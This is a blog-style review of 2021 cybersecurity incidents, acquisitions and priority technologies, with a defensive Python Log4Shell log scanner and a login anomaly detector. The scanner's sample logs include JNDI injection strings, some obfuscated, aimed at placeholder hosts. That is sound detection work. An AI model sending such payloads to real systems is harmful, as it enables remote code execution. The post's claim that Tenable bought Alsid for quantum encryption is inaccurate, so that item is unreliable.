Cybersecurity Rewind 2021
Same as 2020, this year had a lot of major events that reshaped the way of thinking about cybersecurity.
Let's look at some of the most important aspects and go over what happened in the technology space, new alliances, and especially what mess the cybercriminals created this year.
A Quick Recap Of The 2021 Cyberattacks and Breaches
- Twitch: In October 2021, 125GB of data was posted online from Twitch with 6000 internal repositories, SDKs, and red teaming tools.
- LinkedIn: In April 2021, 500 million profiles were leaked including the users’ personal information.
- Colonial Pipeline: In May 2021, Colonial Pipeline, the largest pipeline company in the US had to take its operations down due to a Ransomware attack.
- Kaseya: In July 2021, the REvil ransomware gang exploited a zero-day vulnerability in the Kaseya VSA solution (CVE-2021-30116) to gain admin access and used it as a gateway to launch ransomware attacks on Kaseya’s customers. REvil asked for a $70M ransom, and the attack affected tens of thousands of customers.
- NSO: In July 2021, a new report published by Amnesty International described how the Pegasus spyware is deployed, how it operates, and some of the high-profile cases subject to espionage.
- Microsoft: In March 2021, a Microsoft Exchange vulnerability led to multiple data breaches affecting at least 30,000 companies.
- Log4J: On November 24th, 2021, Alibaba’s Cloud Security Team privately disclosed the Log4Shell zero-day vulnerability (CVE-2021-44228) to the Apache Software Foundation; it was made public on December 9th, 2021. The vulnerability can be explained simply as a failure to differentiate between data and executable commands, which allows attackers to run their malicious code.
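The Log4Shell point above is that a logger treated attacker-supplied data as a lookup command. From the defender's side, the practical follow-up is finding those lookup strings in logs that were already written. The script below is an added example (not code from the original post or from the Apache project): it scans a few constructed access-log lines, first collapsing Log4j's documented lower/upper and default-value (${::-x}) string lookups so that a split-up JNDI lookup is matched as well as a plain one. The log lines and the example.invalid hostnames are constructed placeholders.

```python
import re

# Constructed sample access-log lines (no real traffic). The last three carry
# JNDI lookups in the User-Agent field: one plain, two wrapped in Log4j's
# documented lower/upper and default-value (${::-x}) lookups, which is why a
# scanner has to undo those before matching.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "${${lower:J}ndi:${upper:l}dap://example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:11 +0000] "GET / HTTP/1.1" 200 512 "${${::-j}${::-n}${::-d}${::-i}:rmi://example.invalid/b}"',
]

# Innermost substitution lookups: ${lower:X} -> x, ${upper:X} -> X, ${::-X} -> X
_INNER_LOOKUP = re.compile(r"\$\{(lower:|upper:|::-)([^${}]*)\}", re.IGNORECASE)
# What we are actually looking for once the wrappers are gone
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(match):
    """Replace one innermost lookup with the text it would evaluate to."""
    kind, value = match.group(1).lower(), match.group(2)
    if kind == "lower:":
        return value.lower()
    if kind == "upper:":
        return value.upper()
    return value  # "::-" is the default-value form; it yields its literal


def normalize(text):
    """Collapse nested string-substitution lookups until none are left, so the
    text that a vulnerable Log4j would have evaluated becomes visible."""
    previous = None
    while previous != text:
        previous = text
        text = _INNER_LOOKUP.sub(_resolve, text)
    return text


def scan(lines):
    """Return (line_number, normalized_line) for each line holding a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize(line)
        if _JNDI_LOOKUP.search(normalized):
            hits.append((number, normalized))
    return hits


if __name__ == "__main__":
    for number, line in scan(SAMPLE_LOGS):
        print(f"line {number}: {line}")
```

Run against real web, proxy or application logs, this kind of sweep tells you whether lookup strings reached your systems and which hosts logged them; it says nothing about whether the lookup actually resolved, so it is a triage aid alongside patching and egress monitoring, not a replacement for them.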
Some Of The Key Cybersecurity Alliances
Here are some of the recent security mergers and acquisitions.
- Zscaler acquired Smokescreen Technologies for active defense and deception technologies.
- Splunk acquired TruSTAR, the threat intelligence exchange company.
- Tenable acquired Alsid Limited for quantum encryption.
- Cisco acquired Kenna Security for risk intelligence and vulnerability management.
- Forcepoint acquired Cyberinc for remote browser isolation.
- Deloitte acquired aeCyber solution to help with cyber resilience, regulatory, and compliance.
- Imperva acquired CloudVector for advanced API security.
Most Important Technologies To Focus On
I would say that the technology to highlight is “Multi-factor Authentication”. Yes, it’s still at the top of the list of recommendations, and yes, it can be bypassed sometimes, but as we said, “Done is better than perfect”. However, the controls and technologies below were neglected for ages, not only last year or since the pandemic started, and they have now come back to the surface.
- Insider Threat Management: by far one of the hardest risks for an organization to deal with is protecting sensitive information from insiders, as they are already in and are trusted. It’s still a challenge, but a lot of technologies help prevent insider breaches; detection is still tricky where security is not mature enough, and this area definitely needs more attention.
- Data Governance: organizations’ growth and adoption of digital technologies are exponentially increasing the volume of data to be stored, backed up, managed, protected, and destroyed. It is therefore crucial to manage and protect data through its whole lifecycle, from creation to destruction: classification, access control, backup, and destruction.
- AI and Deep Learning: for automating detection, response, and processing of natural language.
- Active Defense: Where security teams use offensive tactics to slow down or stop hackers to make cyber attacks more difficult to undertake. This also uses deception technologies.
- Deception: Distract attacks from the company’s valuable assets and redirect them to a trap.
- Behavioral Analysis: New threats are discovered every day and zero-days are a reality, which makes traditional security ineffective and slow at detecting unauthorized actions and malicious behaviors. That’s why it’s important to establish baselines for users and machines, identify drift from them, and detect anomalies.
- Securing Backups: Ransomware attacks are the new normal, and they also target backups to reduce the chances that victims can recover their data without paying the ransom. This has made securing backups a must, not only with security controls like encryption and isolation but also with processes.
- Zero Trust: A lot of companies are still struggling with segmentation and with bringing both external and internal networks to an acceptable level of security. The key is to assume that the network is compromised and trust nothing, while enforcing controls, policies, automation, and monitoring.
- Mobile Security: Mobile devices are the most used devices these days and certainly contain more sensitive data than before. That’s why they got greater attention this year, and the mobile security market is booming, offering software and hardware to keep these precious pieces of glass secure.
- 3rd Party Risk: Protecting your company from the unknown is frustrating, especially when a breach is caused by a lack of security on your trusted MSP’s side. That’s why having the right policies and technologies in place to vet 3rd parties and to monitor any abnormal activity is a must to diminish this inherent risk.
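The Behavioral Analysis item in the list above comes down to three steps: learn what is normal for each user, compare new activity against it, and report the drift. The script below is an added example of that loop (not code from the original post or any product it mentions). It builds a per-user baseline from two weeks of constructed login events (usual hours, source countries, outbound data volume) and then scores later events, flagging an off-hours login, a first login from a new country, a data-volume spike, and a user with no history at all. The users, countries and volumes are constructed sample data, and the thresholds (one hour of slack around the usual window, three standard deviations on volume) are illustrative choices, not recommendations from the post.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from statistics import mean, pstdev


@dataclass(frozen=True)
class LoginEvent:
    user: str
    when: datetime
    country: str
    bytes_out: int  # data transferred out during the session


# Constructed sample data (not from any real system): two weeks of routine
# logins as the baseline window, then a handful of later events to score.
BASELINE = [
    LoginEvent("alice", datetime(2021, 11, d, h), "FR", 20_000_000 + 1_000_000 * (d % 5))
    for d in range(1, 15) for h in (8, 9, 13, 16)
] + [
    LoginEvent("bob", datetime(2021, 11, d, h), "DE", 5_000_000 + 250_000 * (d % 5))
    for d in range(1, 15) for h in (9, 10, 14)
]
EVALUATE = [
    LoginEvent("alice", datetime(2021, 11, 20, 9), "FR", 21_000_000),    # routine
    LoginEvent("alice", datetime(2021, 11, 20, 3), "FR", 20_000_000),    # 03:00 login
    LoginEvent("bob", datetime(2021, 11, 21, 10), "US", 5_000_000),      # never-seen country
    LoginEvent("bob", datetime(2021, 11, 21, 10), "DE", 400_000_000),    # data volume spike
    LoginEvent("carol", datetime(2021, 11, 21, 10), "DE", 1_000),        # no history at all
]


@dataclass(frozen=True)
class Baseline:
    earliest_hour: int
    latest_hour: int
    countries: frozenset
    bytes_mean: float
    bytes_std: float


def build_baselines(events):
    """Summarise each user's usual hours, source countries and transfer volume."""
    per_user = defaultdict(list)
    for e in events:
        per_user[e.user].append(e)
    baselines = {}
    for user, evs in per_user.items():
        hours = [e.when.hour for e in evs]
        volumes = [e.bytes_out for e in evs]
        baselines[user] = Baseline(
            earliest_hour=min(hours),
            latest_hour=max(hours),
            countries=frozenset(e.country for e in evs),
            bytes_mean=mean(volumes),
            bytes_std=pstdev(volumes),
        )
    return baselines


def score(event, baselines, slack_hours=1, z_threshold=3.0):
    """Return the reasons an event drifts from its user's baseline; [] means normal."""
    b = baselines.get(event.user)
    if b is None:
        return ["no baseline for user"]
    reasons = []
    if not (b.earliest_hour - slack_hours <= event.when.hour <= b.latest_hour + slack_hours):
        reasons.append(f"login at {event.when.hour:02d}:00 outside usual window")
    if event.country not in b.countries:
        reasons.append(f"first login from {event.country}")
    # Guard against a zero standard deviation in a perfectly regular baseline.
    spread = b.bytes_std or max(b.bytes_mean * 0.1, 1.0)
    z = (event.bytes_out - b.bytes_mean) / spread
    if z > z_threshold:
        reasons.append(f"outbound volume {z:.0f} standard deviations above normal")
    return reasons


def find_anomalies(events, baselines):
    """Return (event, reasons) for every event that has at least one reason."""
    flagged = []
    for e in events:
        reasons = score(e, baselines)
        if reasons:
            flagged.append((e, reasons))
    return flagged


if __name__ == "__main__":
    for e, why in find_anomalies(EVALUATE, build_baselines(BASELINE)):
        print(f"{e.when:%Y-%m-%d %H:%M} {e.user:<6} {e.country}: {'; '.join(why)}")
```

The point of the structure is that each signal is cheap and explainable on its own, and the reasons list is what an analyst sees, so a single odd hour can be tuned away while a new country combined with a volume spike still stands out; in practice the baseline is rebuilt on a rolling window so that legitimate changes in behaviour age into it.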
I hope that you’ve enjoyed reading this short format, aimed at giving a quick snapshot of what happened this year in cyberspace.
Check out my latest video about Risk Management. If you’re interested in starting a career in Cybersecurity, watch this one, and don’t forget to subscribe to my channel and leave a comment if there are any topics you’re interested in seeing in my next videos.
Check my other stuff here.